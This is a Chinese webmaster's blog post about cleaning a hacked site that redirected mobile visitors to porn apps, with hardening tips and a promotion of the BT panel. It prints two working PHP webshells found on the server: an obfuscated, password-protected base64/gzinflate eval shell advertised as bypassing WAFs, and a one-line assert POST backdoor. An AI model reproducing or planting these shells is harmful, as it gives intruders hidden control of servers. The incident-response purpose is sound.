最近网站被挂马了,因为平时不喜欢管理,也不知道好久挂马的,网友反应安卓手机会偶尔跳转到色情网站app.
1,先按照官方源码查看有没多了的文件。可结合宝塔面板微步木马检查软件
找到几个可疑文件,因为用的是开源cms,直接下载官方下来,看有没有。
①发现再upload/editor文件夹(平时没有设置上传防护的文件夹)有一个可疑文件abagai2.php和index.php(这个宝塔也提醒我了)
<?php
$password='8786811';//登录密码
//本次更新:体积优化、压缩优化、命令优化、反弹优化、文件管理优化、挂马清马优化等大量功能细节优化。
//功能特色:PHP高版本低版本都能执行,文件短小精悍,方便上传,功能强大,提权无痕迹,无视waf,过安全狗、云锁、360、阿里云、护卫神等主流waf。同时支持菜刀、xise连接。
$html='$password'.'='."'".$password."';".'@e#html'.''.'v'."".''.''."".''.''.''.'a'.''.'l('.'g'.''."".''.''.'z'.'i'.''.''.'n'.'f'.'l'.''.''."".'a'.'t'.'e(b'.'as'.''.''.''."".''.'e'.'6'.''."".''."".""."".''.'4_'.'d'.'e'.'c'.''.''.''."".''."".'o'.'d'.'e'.'('."'lVZhb5tIEP0eKf9hg6ICEufgXBy1sSI1TTHJKcY5jJsmbYTwspitMUt3SWiT+r/fLLZjjN3UxxfE7sybN29nZtndIZwz7nOSMZ7TdKSZent3RxAhKEt9kQc81+QKjZC2R4Ugubbv961+/7LnfFGyOAsyqtzrOnre3UHw7GN0ilS1Pf96EIQHI5LmcrXLnmiSBAdHDRNpmE2yIKfDhLRRt39poeOG2UY3NA1ZIZDjoVbjUF/i8AQQhoEgx0d+SDALibb6pdwO4n7Xdqzh33fdrvnP460Z2uFhx3M+f6DDT9mhd5G5odn66Ny04k/N8bvz0empouuVCA4p6jGUq6cP10M7iYOmexl8dv7t2XHRtTtjbI9a2O4UgTfg+Ntdcns4Lm69uBXcZPndU/JIbKfo3Tg8nMSTq0JGmgeSQkYPKc6lvuQHFbnQ1EgwPGYZSdWlkiWrhKZjSDwLuCA+UNQkzwVUafH9gfCfYFKaflFB01i9rxrETEj1Rc5zlrCCcG1uKjfU+xWwKAPLFzJa6Wugt6aB9qFOUjZ7A5SBmmbVU2YF3ivkS0T2IIMrtuWhg+cZ2Sm68Lzrg2bD/Mq/pkp7g0cDXC4g9gl6LjlMX7UcQJH9dSar7AT9/xp7FfqcpSkpz+oEnSdMEGm9ySMqOM2J1MAovfU6Ik1jEoSEgxrN+h5maQ7shVSqDlzENCHQexFhUSnxmsaLQiHy7EYE6qlkcWS+O66zeDmqJZtTZG5EXCXWmBUY2YA3/VOIN2+QNucH+YF06NcvVFmQauq/51ARzvxz+NpnhOWhlbqtiS6bZpFgZXOOMF226x4UfMZAVmws5oQus1prYwybPk1prr6yT34QXG9zHAOZF2+tyrVchbHLMpi8ODbQ+cC96l17PrxmdLay9i67Vm/gQd+2trJ3LW/gOp575vQ7lmsgzx1Y29HqW+6ZbTmeUZn+K0MGL3KVSkjnNdz5oS13tjgMEM6H4tfUIIEpJ2elH22aqDmZZLLR3kfQV2vjtIwAFvlPbWap6xvK5j2dZIm8HlTVmCOugVRoKiFJPlJ+loYdiKlshpR0ZAL+oiRXuFUE2JT/HjRSFCSC1MpqNvfl7Z4EeJYt2AMjBZzxyqmsX+rgPHqiaZQEef2yBd8Ks+ns92CLvwPyGCQbLQBs+h8=')));";$css=base64_decode("Q3JlYXRlX0Z1bmN0aW9u");$style=$css('',preg_replace("/#html/","",$html));$style();/*));.'<linkrel="stylesheet"href="$#css"/>';*/②发现upload文件夹有一个indexx.php文件(这个宝塔也提醒我了)
<?php @assert($sb="$_POST[360]");?>删完之后建议开启网站防篡改
2)彻底清查整站程序源码
一般情况下当网站被黑恶意跳转,百分百中招应该做的就是针对网站进行彻底的清查。
具体方法,网站管理面板对站点进行打包下载,电脑本地使用网马查杀软件进行分析。
建议使用 D盾Web查杀(webshell查杀) 工具,如下图:
D盾webshell查杀软件
如果你对源码不了解,请联系你的网站开发人员或者是模板制作人员协助处理。(一般会收取费用)应该第一时间把隐藏的风险文件和后门程序进行剔除。(记得网站原始数据进行备份)
确定处理干净之后的源码重新传到网站主机当中,确保网站正确运行即可。
强化安全操作:
- 修改网站后台密码的复杂性和长度;
- 修改服务器管理面板的控制权限;
- 修改FTP账号密码等信息;
- 检查服务器的安全日志修补漏洞 ;
- 购买服务器厂商的安全防护类产品等;
3)分析网站后门Wehshell文件
为了进行研究和学习,我特意把查杀出来的几个后门文件进行分析:如下图
打开其中PHP后门文件查看代码
密码就是上图的红框标记出来的,进行MD5解密后得到admins
入侵者通过自己的后门PHP入口,可以轻松获得你服务器主机的各种权限和操作,如下图:
吓出一身冷汗!!!
另外一个后门PHP文件登录后的界面和功能
严重性就不多说了,网站的安全性多么重要啊。做为站长SEO人员一定要及时发现漏洞和后门,及时处理做好防护,后果不堪设想。
4)后续安全终极操作与防护
我自己使用的是服务器,管理环境面板是宝塔,安装相应的防火墙和系统加固功能来实现。
提示,宝塔环境面板是目前服务器网站环境最好用的,建议新手服务器环境配置首选 宝塔BT面板。
这里有关使用的文章 http://BT.CN宝塔面板环境安装流程(图文教程)新手请查看。
相关安全配置功能,在自己的宝塔面板中可以购买开启,有些功能需要购买付费。
